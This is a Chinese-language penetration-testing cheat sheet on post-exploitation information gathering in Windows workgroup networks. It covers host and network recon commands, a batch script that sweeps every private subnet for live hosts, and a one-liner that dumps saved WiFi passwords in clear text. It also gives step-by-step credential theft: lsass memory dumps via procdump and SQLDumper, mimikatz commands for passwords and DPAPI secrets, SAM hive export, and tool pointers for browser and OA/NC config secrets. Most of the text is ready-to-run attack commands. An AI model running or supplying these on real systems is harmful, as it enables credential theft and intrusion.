Windows工作组内网信息收集技术详解

1. 基础信息收集命令

1.1 用户与权限信息

• whoami - 查看当前用户及权限
• net user - 查看主机账号，可用于定制密码字典
• quser - 查看在线用户，特别关注管理员是否在线

1.2 系统信息

• systeminfo - 查看系统信息及补丁情况，判断是否有域环境
• hostname - 查看当前主机名
• tasklist /svc - 查看安装的软件及服务，判断杀毒软件

1.3 网络信息

• ipconfig /all - 查看完整IP配置信息
• netstat -nao - 查看网络连接状态，判断IP段和出网限制端口
• arp -a - 查看ARP缓存表，发现内网有价值通信记录
• route print - 查看路由表信息
• cmdkey /l - 查看当前保存的登录凭证，可能包含连接的IP信息

2. 内网存活主机探测

2.1 内网存活段自动发现脚本

@echo off
rem 内网存活段自动发现脚本 [Windows]
rem By Klion
rem 2020.7.1
setlocal enabledelayedexpansion

for /l %%i in (0,1,255) do (
    for /l %%k in (0,1,255) do (
        ping -w 1 -n 1 10.%%i.%%k.1 | findstr "TTL=" >nul || ping -w 1 -n 1 10.%%i.%%k.254 | findstr "TTL=" >nul
        if !errorlevel! equ 0 (
            echo 10.%%i.%%k.0/24 is alive ! >> alive.txt
        ) else (
            echo 10.%%i.%%k.0/24 May be sleeping !
        )
    )
)

for /l %%s in (16,1,31) do (
    for /l %%d in (0,1,255) do (
        ping -n 1 -w 1 172.%%s.%%d.1 | findstr "TTL=" >nul || ping -w 1 -n 1 172.%%s.%%d.254 | findstr "TTL=" >nul
        if !errorlevel! equ 0 (
            echo 172.%%s.%%d.0/24 is alive ! >> alive.txt
        ) else (
            echo 172.%%s.%%d.0/24 May be sleeping !
        )
    )
)

for /l %%t in (0,1,255) do (
    ping -n 1 -w 1 192.168.%%t.1 | findstr "TTL=" >nul || ping -n 1 -w 1 192.168.%%t.254 | findstr "TTL=" >nul
    if !errorlevel! equ 0 (
        echo 192.168.%%t.0/24 is alive ! >> alive.txt
    ) else (
        echo 192.168.%%t.0/24 May be sleeping !
    )
)

3. 敏感信息收集技术

3.1 最近访问文档

dir %APPDATA%\Microsoft\Windows\Recent - 查看最近打开的文档

3.2 WiFi密码获取

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

3.3 RDP凭证提取与破解

1. 检查是否存在凭证：
   dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

2. 使用procdump提取lsass进程内存：
   procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3. 使用mimikatz分析：

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::dpapi

4. 解密凭证：
   mimikatz# dpapi::cred /in:<Credentials文件凭证路径> /masterkey:xxxxxxxx

3.4 浏览器密码获取

推荐使用moonD4rk师傅的项目获取浏览器保存的密码

4. 本地密码哈希提取技术

4.1 使用procdump和mimikatz

1. 导出lsass进程：
   procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2. 使用mimikatz分析：

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonPasswords full

4.2 使用SQLDumper

1. 查找lsass进程PID：
   for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do Sqldumper.exe %i 0 0x01100

2. 使用mimikatz分析生成的dump文件：

mimikatz# sekurlsa::minidump SQLDmpr0001.mdmp
mimikatz# sekurlsa::logonPasswords full

4.3 从SAM数据库提取

1. 导出SAM和SYSTEM文件：

reg save hklm\sam .\sam.hive
reg save hklm\system .\system.hive

2. 使用mimikatz分析：
   lsadump::sam /system:sys.hive /sam:sam.hive

5. 常见系统配置文件位置

在渗透测试中，常见的入口点包括：

• 泛*OA系统
• 致*OA系统
• 通*OA系统
• 用*NC系统

对于用*NC系统，可以使用jas502n师傅的项目进行解密。

其他系统的配置文件通常可以在以下位置找到：

• 应用程序安装目录下的.config文件
• Web目录下的配置文件
• 数据库连接配置文件

6. 总结

内网渗透的关键步骤：

1. 打点 - 获取初始访问权限
2. 提权/维权 - 提升权限并维持访问
3. 信息收集 - 深入了解目标环境
4. 横向移动 - 在内网中扩展控制范围

信息收集的深度直接决定了后渗透阶段权限持续把控的能力，因此需要熟练掌握各种信息收集技术。